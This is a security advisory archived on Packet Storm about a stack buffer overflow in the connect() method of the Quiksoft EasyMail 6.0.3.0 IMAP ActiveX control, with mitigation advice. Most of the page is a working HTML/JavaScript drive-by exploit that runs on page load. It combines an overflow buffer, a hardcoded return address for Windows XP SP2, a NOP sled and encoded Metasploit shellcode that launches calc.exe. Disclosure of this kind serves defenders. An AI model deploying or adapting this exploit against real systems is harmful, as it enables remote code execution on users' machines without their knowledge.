exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Quiksoft EasyMail 6.0.3.0 IMAP connect() Stack Overflow

Quiksoft EasyMail 6.0.3.0 IMAP connect() Stack Overflow
Posted Sep 18, 2009
Authored by Sebastian Wolfgarten | Site devtarget.org

Quiksoft EasyMail version 6.0.3.0 suffers from an IMAP related connect() stack overflow vulnerability.

tags | exploit, overflow, imap
SHA-256 | 66991cdd84a9ccc131edc267756ec5e66748a1a775a9804a3050875dd458e065

Quiksoft EasyMail 6.0.3.0 IMAP connect() Stack Overflow

Change Mirror Download
<!--

I - TITLE

Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX
stack overflow exploit

II - SUMMARY

Description: Remotely exploitable buffer overflow in ActiveX component
Quiksoft EasyMail 6.0.3.0 allows for the arbitrary code execution in the
user context.

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org

Date: September 17th, 2009

Severity: Medium (remote code execution in the user context)

References: http://www.devtarget.org/easymail-advisory-09-2009.txt

III - OVERVIEW

Quote from quiksoft.com: "The EasyMail Products are relied upon by over
thousands
of international corporations, federal, state and local organizations,
and individual
developers. Quiksoft has established the EasyMail products as "the
professional,
reliable, and easy to use choice for e-mail development". More
information about
the product can be found online at http://www.quiksoft.com.

IV - DETAILS

The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX
component
to facilitate the development of IMAP4-aware applications. The connect()
function
of this component is prone to a classic buffer overflow vulnerability
when a
particularly long argument is passed and the application attempts to
copy that
data into a finite buffer. This allows for the execution of arbitrary
code in the
user context.

V - MITIGATING MEASURES

Either set the killbit for the relevant ActiveX component
(clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)
or install the latest version of Quiksoft EasyMail which is not
considered vulnerable.

VI - NOTES

Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis
Provencher
for drawing my attention on Quiksoft EasyMail. Shellcode below is rather
harmless and
executes calc.exe.

Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0

-->

<html>
<head>
<title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
<script language="JavaScript" defer>
function Check() {

var buf = 'A';
while (buf.length <= 440) buf = buf + 'A';


// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378
Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +

"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +

"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +

"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +

"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +

"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +

"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +

"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +

"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +

"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +

"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +

"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +

"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +

"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +

"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +

"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +

"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +

"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +

"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +

"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +

"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +

"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +

"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
"%4e%31%75%74%38%70%65%77%70%43");

var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English

var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

var m = buf + eip + nop + shellcode1 + nop;

obj.connect(m);
}

</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
Failed to instantiate object.
</object>
</body>
</html>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close